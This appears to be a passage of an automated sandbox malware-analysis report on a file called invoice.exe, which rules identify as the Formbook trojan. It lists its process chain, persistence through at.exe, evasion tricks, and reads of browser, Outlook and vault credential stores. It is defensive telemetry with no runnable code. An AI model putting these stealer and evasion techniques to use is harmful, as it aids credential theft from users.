            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DDAAC1_2_039DDAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03985AA01_2_03985AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E1AA31_2_039E1AA3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039EDAC61_2_039EDAC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FFA491_2_039FFA49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F7A461_2_039F7A46
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B3A6C1_2_039B3A6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D59101_2_039D5910
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039499501_2_03949950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395B9501_2_0395B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039438E01_2_039438E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AD8001_2_039AD800
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03941F921_2_03941F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FFFB11_2_039FFFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03903FD21_2_03903FD2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03903FD51_2_03903FD5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FFF091_2_039FFF09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03949EB01_2_03949EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395FDC01_2_0395FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F1D5A1_2_039F1D5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03943D401_2_03943D40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F7D731_2_039F7D73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FFCF21_2_039FFCF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B9C321_2_039B9C32
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0392B970 appears 262 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03975130 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 039AEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 039BF290 appears 103 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03987E54 appears 99 times
            Source: C:\Users\user\Desktop\invoice.exeCode function: String function: 00F87F41 appears 35 times
            Source: C:\Users\user\Desktop\invoice.exeCode function: String function: 00FA8A80 appears 42 times
            Source: C:\Users\user\Desktop\invoice.exeCode function: String function: 00FA0C63 appears 70 times
            Source: invoice.exeStatic PE information: Resource name: RT_VERSION type: Intel 80386 COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
            Source: invoice.exe, 00000000.00000003.1716154182.000000000433D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs invoice.exe
            Source: invoice.exe, 00000000.00000003.1717375076.00000000041E3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs invoice.exe
            Source: invoice.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.3576495613.0000000003730000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.3575236547.0000000003260000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.1867193556.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.3576582157.00000000037C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000002.3576662143.00000000026F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.1867580811.0000000003760000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.3576480081.0000000002850000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.1867970632.0000000004000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/3@16/9
            Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_00FEA0F4 GetLastError,FormatMessageW,0_2_00FEA0F4
            Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_00FD84F3 AdjustTokenPrivileges,CloseHandle,0_2_00FD84F3
            Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_00FD8AA3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_00FD8AA3
            Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_00FEB3BF SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_00FEB3BF
            Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_00FFEF21 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_00FFEF21
            Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_00FF84D0 CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,0_2_00FF84D0
            Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_00F84FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00F84FE9
            Source: C:\Users\user\Desktop\invoice.exeFile created: C:\Users\user\AppData\Local\Temp\aut42FE.tmpJump to behavior
            Source: invoice.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\invoice.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: at.exe, 00000003.00000003.2150572886.00000000035C1000.00000004.00000020.00020000.00000000.sdmp, at.exe, 00000003.00000003.2151608695.00000000035C1000.00000004.00000020.00020000.00000000.sdmp, at.exe, 00000003.00000002.3575543840.00000000035C1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: invoice.exeReversingLabs: Detection: 23%
            Source: invoice.exeVirustotal: Detection: 30%
            Source: unknownProcess created: C:\Users\user\Desktop\invoice.exe "C:\Users\user\Desktop\invoice.exe"
            Source: C:\Users\user\Desktop\invoice.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\invoice.exe"
            Source: C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exeProcess created: C:\Windows\SysWOW64\at.exe "C:\Windows\SysWOW64\at.exe"
            Source: C:\Windows\SysWOW64\at.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\invoice.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\invoice.exe"Jump to behavior
            Source: C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exeProcess created: C:\Windows\SysWOW64\at.exe "C:\Windows\SysWOW64\at.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\at.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\invoice.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\invoice.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\invoice.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\invoice.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\invoice.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\invoice.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\invoice.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\invoice.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\invoice.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\invoice.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\invoice.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\invoice.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\at.exeSection loaded: schedcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\at.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\at.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\at.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\at.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\at.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\at.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\at.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\at.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\at.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\at.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\at.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\at.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\at.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\at.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\at.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\at.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\at.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\at.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\at.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\at.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\at.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\at.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\at.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\SysWOW64\at.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\at.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: invoice.exeStatic file information: File size 1281536 > 1048576
            Source: invoice.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: invoice.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: invoice.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: invoice.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: invoice.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: invoice.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: invoice.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: at.pdb source: svchost.exe, 00000001.00000003.1826096007.000000000321A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1867363177.0000000003200000.00000004.00000020.00020000.00000000.sdmp, usnnduqerdgHbr.exe, 00000002.00000002.3575669799.0000000000CB8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: usnnduqerdgHbr.exe, 00000002.00000000.1784643817.0000000000DCE000.00000002.00000001.01000000.00000004.sdmp, usnnduqerdgHbr.exe, 00000007.00000002.3576287714.0000000000DCE000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: invoice.exe, 00000000.00000003.1718353070.00000000040C0000.00000004.00001000.00020000.00000000.sdmp, invoice.exe, 00000000.00000003.1717554649.0000000004260000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1867610826.0000000003900000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1767065111.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1867610826.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1768545238.0000000003700000.00000004.00000020.00020000.00000000.sdmp, at.exe, 00000003.00000003.1869790463.0000000003978000.00000004.00000020.00020000.00000000.sdmp, at.exe, 00000003.00000002.3576797983.0000000003B20000.00000040.00001000.00020000.00000000.sdmp, at.exe, 00000003.00000003.1867832412.00000000037CB000.00000004.00000020.00020000.00000000.sdmp, at.exe, 00000003.00000002.3576797983.0000000003CBE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: invoice.exe, 00000000.00000003.1718353070.00000000040C0000.00000004.00001000.00020000.00000000.sdmp, invoice.exe, 00000000.00000003.1717554649.0000000004260000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.1867610826.0000000003900000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1767065111.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1867610826.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1768545238.0000000003700000.00000004.00000020.00020000.00000000.sdmp, at.exe, 00000003.00000003.1869790463.0000000003978000.00000004.00000020.00020000.00000000.sdmp, at.exe, 00000003.00000002.3576797983.0000000003B20000.00000040.00001000.00020000.00000000.sdmp, at.exe, 00000003.00000003.1867832412.00000000037CB000.00000004.00000020.00020000.00000000.sdmp, at.exe, 00000003.00000002.3576797983.0000000003CBE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: at.pdbGCTL source: svchost.exe, 00000001.00000003.1826096007.000000000321A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1867363177.0000000003200000.00000004.00000020.00020000.00000000.sdmp, usnnduqerdgHbr.exe, 00000002.00000002.3575669799.0000000000CB8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: at.exe, 00000003.00000002.3577269049.000000000414C000.00000004.10000000.00040000.00000000.sdmp, at.exe, 00000003.00000002.3575543840.0000000003542000.00000004.00000020.00020000.00000000.sdmp, usnnduqerdgHbr.exe, 00000007.00000000.1933940894.0000000002B2C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2261440991.000000001055C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: at.exe, 00000003.00000002.3577269049.000000000414C000.00000004.10000000.00040000.00000000.sdmp, at.exe, 00000003.00000002.3575543840.0000000003542000.00000004.00000020.00020000.00000000.sdmp, usnnduqerdgHbr.exe, 00000007.00000000.1933940894.0000000002B2C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2261440991.000000001055C000.00000004.80000000.00040000.00000000.sdmp
            Source: invoice.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: invoice.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: invoice.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: invoice.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: invoice.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_00FFC104 LoadLibraryA,GetProcAddress,0_2_00FFC104
            Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_00FE8538 push FFFFFF8Bh; iretd 0_2_00FE853A
            Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_00FAE88F push edi; ret 0_2_00FAE891
            Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_00FAE9A8 push esi; ret 0_2_00FAE9AA
            Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_00FA8AC5 push ecx; ret 0_2_00FA8AD8
            Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_00FAEB83 push esi; ret 0_2_00FAEB85
            Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_00FAEC6C push edi; ret 0_2_00FAEC6E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004030B7 pushfd ; retf 1_2_004030B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00426973 push es; ret 1_2_00426986
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00418110 push eax; iretd 1_2_00418114
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041411E push edi; ret 1_2_0041411F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00411A74 pushad ; iretd 1_2_00411A84
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00414AB4 pushad ; retf 1_2_00414AB5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00403460 push eax; ret 1_2_00403462
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004164EE push esp; ret 1_2_004164EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0390225F pushad ; ret 1_2_039027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039027FA pushad ; ret 1_2_039027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039309AD push ecx; mov dword ptr [esp], ecx1_2_039309B6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0390283D push eax; iretd 1_2_03902858
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03901368 push eax; iretd 1_2_03901369

            Boot Survival

            barindex
            Uses schtasks.exe or at.exe to add and modify task schedules
            Source: C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exeProcess created: C:\Windows\SysWOW64\at.exe "C:\Windows\SysWOW64\at.exe"
            Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_00F84A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00F84A35
            Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_010053DF IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_010053DF
            Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_00FA3307 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00FA3307
            Source: C:\Users\user\Desktop\invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\at.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\at.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\at.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\at.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\at.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\Desktop\invoice.exeAPI/Special instruction interceptor: Address: 152E80C
            Source: C:\Windows\SysWOW64\at.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
            Source: C:\Windows\SysWOW64\at.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
            Source: C:\Windows\SysWOW64\at.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
            Source: C:\Windows\SysWOW64\at.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
            Source: C:\Windows\SysWOW64\at.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
            Source: C:\Windows\SysWOW64\at.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
            Source: C:\Windows\SysWOW64\at.exeAPI/Special instruction interceptor: Address: 7FFE22210154
            Source: C:\Windows\SysWOW64\at.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0397096E rdtsc 1_2_0397096E
            Source: C:\Windows\SysWOW64\at.exeWindow / User API: threadDelayed 5280Jump to behavior
            Source: C:\Windows\SysWOW64\at.exeWindow / User API: threadDelayed 4693Jump to behavior
            Source: C:\Users\user\Desktop\invoice.exeAPI coverage: 4.6 %
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
            Source: C:\Windows\SysWOW64\at.exe TID: 6960Thread sleep count: 5280 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\at.exe TID: 6960Thread sleep time: -10560000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\at.exe TID: 6960Thread sleep count: 4693 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\at.exe TID: 6960Thread sleep time: -9386000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe TID: 2008Thread sleep time: -65000s >= -30000sJump to behavior
